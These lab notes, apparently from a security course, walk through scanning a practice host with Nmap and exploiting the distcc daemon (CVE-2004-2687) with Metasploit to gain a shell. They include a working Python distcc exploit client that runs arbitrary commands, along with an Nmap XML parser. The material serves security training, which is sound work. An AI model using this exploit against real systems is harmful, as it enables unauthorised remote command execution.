Lesson 1 Lab Notes

In this lab we will do the following:
  • Run a port scan against our target and enumerate its network services with Nmap.
  • Review and save the Nmap scan results for future lessons.
  • Import the scan into the Metasploit Framework.
  • Use Metasploit to exploit the distcc daemon.
What is distcc?

distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed.

CVE (Common Vulnerabilities and Exposures) Information:

http://www.cvedetails.com/cve/cve-2004-2687

CVE-2004-2687: distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks. In plain terms, the daemon runs whatever command line a client hands it as a "compile job", so anyone who can reach the server port can run commands on the box.

Module Information:

Rapid7's module database tells you which Metasploit module to use: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

And Exploit-DB, which is bookmarked in your Firefox by default, shows you the module's source code in case you are curious: https://www.exploit-db.com/exploits/9915/
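To see why a "compile job" is really a remote command, here is an added Python example (not part of the lab notes and not the Metasploit module's code) that speaks the distcc v1 wire protocol the module uses: every token is a four-letter name followed by eight hex digits giving a value or a length. build_request encodes a job the way distcc_exec does, command_argv reproduces the argv trick from the module (sh -c <cmd> followed by # -c main.c -o main.o, so distccd's scan of the argument list for a -c compile of a .c file passes while sh ignores everything after #), and parse_response decodes the daemon's DONE/STAT/SERR/SOUT/DOTO reply. The sample reply is constructed; send_command is a live helper you would only point at a target you are authorised to test, such as the lab box.

```python
import socket

# Added example (not code from the lab or from the Metasploit module): a minimal
# client for the distcc v1 wire protocol that distccd (TCP 3632) speaks.
# Each token is a 4-character name followed by 8 lowercase hex digits.


def token(name, value):
    """Encode one protocol token, e.g. token("ARGC", 3) -> b"ARGC00000003"."""
    if len(name) != 4:
        raise ValueError("distcc token names are exactly 4 characters")
    return f"{name}{value:08x}".encode("ascii")


def build_request(argv, source=b""):
    """Build a compile request: DIST (protocol version), ARGC, one ARGV per
    argument, then the preprocessed source as DOTI (empty here: the daemon
    runs the command regardless of what the 'source' contains)."""
    req = token("DIST", 1) + token("ARGC", len(argv))
    for arg in argv:
        raw = arg.encode()
        req += token("ARGV", len(raw)) + raw
    return req + token("DOTI", len(source)) + source


def command_argv(cmd):
    """argv shape used by exploit/unix/misc/distcc_exec. distccd looks through
    the argument list for a '-c <src>.c -o <obj>.o' compile so it can swap in
    temp file names; putting those after '#' satisfies that check while sh
    treats everything after '#' as a comment and only runs cmd."""
    return ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]


def parse_response(data):
    """Decode the daemon's reply: DONE/STAT carry a number, SERR/SOUT/DOTO carry
    a length-prefixed blob (compiler stderr, stdout and the 'object file')."""
    out, pos = {}, 0
    while pos + 12 <= len(data):
        name = data[pos:pos + 4].decode("ascii")
        value = int(data[pos + 4:pos + 12], 16)
        pos += 12
        if name in ("SERR", "SOUT", "DOTO"):
            out[name] = data[pos:pos + value]
            pos += value
        else:
            out[name] = value
    return out


def send_command(host, cmd, port=3632, timeout=5.0):
    """Live helper (not exercised offline): send cmd to a distccd you are
    authorised to test and decode what comes back. Command output from
    distccd arrives in SOUT/SERR."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(command_argv(cmd)))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    print(build_request(command_argv("id")))
    # Constructed reply in the shape distccd returns; a real reply will differ.
    sample = (b"DONE00000001STAT00000000SERR00000000"
              b"SOUT0000000euid=1(daemon)\nDOTO00000000")
    print(parse_response(sample))
```

The point to take away: nothing in the request authenticates the client. The only thing standing between an exposed port 3632 and code execution as the daemon user is whether distccd was started with --allow to restrict which networks may submit jobs.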

Instructions:

A typical first Nmap scan of the target, 172.16.56.2, looks like this:

nmap -T4 -A -v 172.16.56.2

It's important to know what the switches do.

-T<0-5> (e.g. -T4) | Set the timing template; the higher the number, the faster (and noisier) the scan
-A                 | Enable OS detection, version detection, script scanning and traceroute
-v                 | Verbose output

While -T4 -A -v will get the job done, it only scans Nmap's top 1000 TCP ports, not the entire port range. You will want to scan the entire port range of your target, and remember, on this host nearly every service has an exploit. Here are my favorite Nmap switches that I want to share with you:

-p-       | Scan all 65535 TCP ports (1-65535)
-p 80     | Scan only port 80
-p 80,443 | Scan ports 80 and 443
-sS       | TCP SYN scan (the default when you run Nmap as root; an unprivileged user gets a full connect scan instead)
-sV       | Service and version detection
-sC       | Run the default NSE script set (same as --script=default). It runs without -sV, but several default scripts give better results when version detection is on, so use the two together.
-O        | Enable OS detection (needs root)
-n        | Skip DNS resolution; useful when you are scanning multiple hosts and want to cut down on how long the scan will run
-iL <file path> | Read targets from a file, very handy if you want to scan multiple hosts
--open          | Show only open ports; useful when you are scanning the entire port range and don't care to see which ports are closed or filtered
--reason        | Show why each port is in its particular state (e.g. syn-ack, no-response)

You can find the rest of the switches in the Nmap reference guide (man nmap), and there are plenty of Nmap cheat sheets online.

Now let’s run our NMap scan!

nmap -p- -sS -sC -sV --open --reason -v 172.16.56.2

You'll see that distcc (Nmap reports it as distccd) is listening on port 3632, and that nearly every service running on our Linux host is exploitable.

Save this scan before moving on. Metasploit's db_import expects Nmap's XML output, so run the scan with -oX <file> (or -oA <basename> to get the normal, grepable and XML formats at once); the file imported below, /root/hackmd/meta2_2017-03-27.xml, is that kind of XML output. Then launch the Metasploit Framework (msfconsole).
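Here is an added Python example (not part of the lab notes) that reads the XML Nmap writes with -oX, the same file db_import consumes, and lists only the open ports with their reason, service and version, so you can pick out distccd on 3632 from a full 65535-port scan without scrolling. The embedded XML is a constructed sample in Nmap's output shape, not a real scan of the lab host; load_scan(path) does the same for a real -oX file.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of `nmap -oX` output, trimmed to the elements
# this script reads. It is NOT a real scan result for 172.16.56.2.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p- -sS -sC -sV --open --reason -oX meta2.xml 172.16.56.2">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="172.16.56.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack" reason_ttl="64"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/>
      </port>
      <port protocol="tcp" portid="3632">
        <state state="open" reason="syn-ack" reason_ttl="64"/>
        <service name="distccd" product="distccd" version="v1"/>
      </port>
      <port protocol="tcp" portid="8787">
        <state state="filtered" reason="no-response" reason_ttl="0"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return one dict per open port (host, port, protocol, reason, service,
    product, version). Closed and filtered ports are skipped, which is what
    --reason plus --open would show you on the console."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else None
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")  # absent when -sV could not identify it
            found.append({
                "host": ip,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "reason": state.get("reason"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return found


def by_service(results, name):
    """Filter open_ports() output by Nmap service name, e.g. 'distccd'."""
    return [r for r in results if r["service"] == name]


def load_scan(path):
    """Parse a real -oX file from disk, e.g. /root/hackmd/meta2_2017-03-27.xml."""
    with open(path, "rb") as f:
        return open_ports(f.read())


if __name__ == "__main__":
    for r in open_ports(SAMPLE_XML):
        print(f"{r['host']} {r['port']}/{r['protocol']} {r['reason']} "
              f"{r['service']} {r['product'] or ''} {r['version'] or ''}")
```

Keeping the XML (rather than just the console output) also means the service and version strings survive for later lessons, and db_import will load the same file straight into the Metasploit database.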

I like to use workspaces in Metasploit to keep my targets separated.

workspace

On its own, workspace shows which workspace (and therefore which database) you are working in. I've already created a workspace called meta2 by typing in the following command:

workspace -a meta2

Creating a workspace with -a moves you into it automatically. In my case it already existed, so I have to switch to it:

workspace meta2

Once you are in the workspace, let's import our Nmap scan into Metasploit (db_import reads Nmap's XML output):

db_import /root/hackmd/meta2_2017-03-27.xml

With that done, let's move on to the actual exploit. Search for the module, load it, and run show options to list the module's parameters:

search distcc
use exploit/unix/misc/distcc_exec
show options

RHOST stands for Remote Host; it is the target address and is required for this module to run. (Newer Metasploit releases name this option RHOSTS; show options tells you which name your version uses.)

set RHOST 172.16.56.2
exploit

That's all we had to do to get a shell on our Linux server. We now have shell access, and if you type

whoami

It will show you that you are running as daemon. From here you can escalate privileges from daemon to root by exploiting the udev process. It is a manual exploit, but I've linked a video below that can walk you through it. I ran the udev exploit, and if you can find the files I left on the server I will give you crewhu! :)

https://youtu.be/DoUZFHwZntY?t=8m40s
